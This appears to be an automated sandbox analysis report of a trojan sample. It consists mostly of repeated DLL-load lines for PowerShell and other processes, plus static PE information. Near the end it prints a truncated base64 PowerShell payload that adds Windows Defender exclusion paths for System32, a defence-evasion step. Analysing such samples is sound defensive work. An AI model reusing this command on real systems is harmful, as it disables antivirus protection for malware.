    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
    Source: C:\Windows\System32\console_zero.exeSection loaded: libcurl.dll
    Source: C:\Windows\System32\console_zero.exeSection loaded: zlib1.dll
    Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
    Source: C:\Windows\System32\console_zero.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\bav64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeStatic PE information: Image base 0x140000000 > 0x60000000
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeStatic file information: File size 1694720 > 1048576
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x16c200
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, libcurl.dll.14.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: svchost.exe, 00000031.00000002.3261750163.00007FF8A6ECB000.00000002.00000001.01000000.00000012.sdmp
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: svchost.exe, 00000031.00000002.3262542690.00007FF8B8B18000.00000002.00000001.01000000.00000010.sdmp
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: svchost.exe, 00000031.00000002.3262542690.00007FF8B8B18000.00000002.00000001.01000000.00000010.sdmp
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: svchost.exe, 00000031.00000002.3262267641.00007FF8B7EC0000.00000002.00000001.01000000.00000011.sdmp
    Source: Binary string: PrintUI.pdb source: curlapp64.exe, 00000005.00000003.2159397966.00000231626E7000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000E.00000002.2704165993.00007FF7BAC82000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000E.00000000.2160549027.00007FF7BAC82000.00000002.00000001.01000000.00000007.sdmp
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: svchost.exe, 00000031.00000002.3262267641.00007FF8B7EC0000.00000002.00000001.01000000.00000011.sdmp
    Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: bav64.exe, 0000003D.00000002.2979358355.000002A41F9AB000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: PrintUI.pdbGCTL source: curlapp64.exe, 00000005.00000003.2159397966.00000231626E7000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000E.00000002.2704165993.00007FF7BAC82000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000E.00000000.2160549027.00007FF7BAC82000.00000002.00000001.01000000.00000007.sdmp
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

    Data Obfuscation

    barindex
    Found suspicious powershell code related to unpacking or dynamic code loading
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMz
    Suspicious command line found
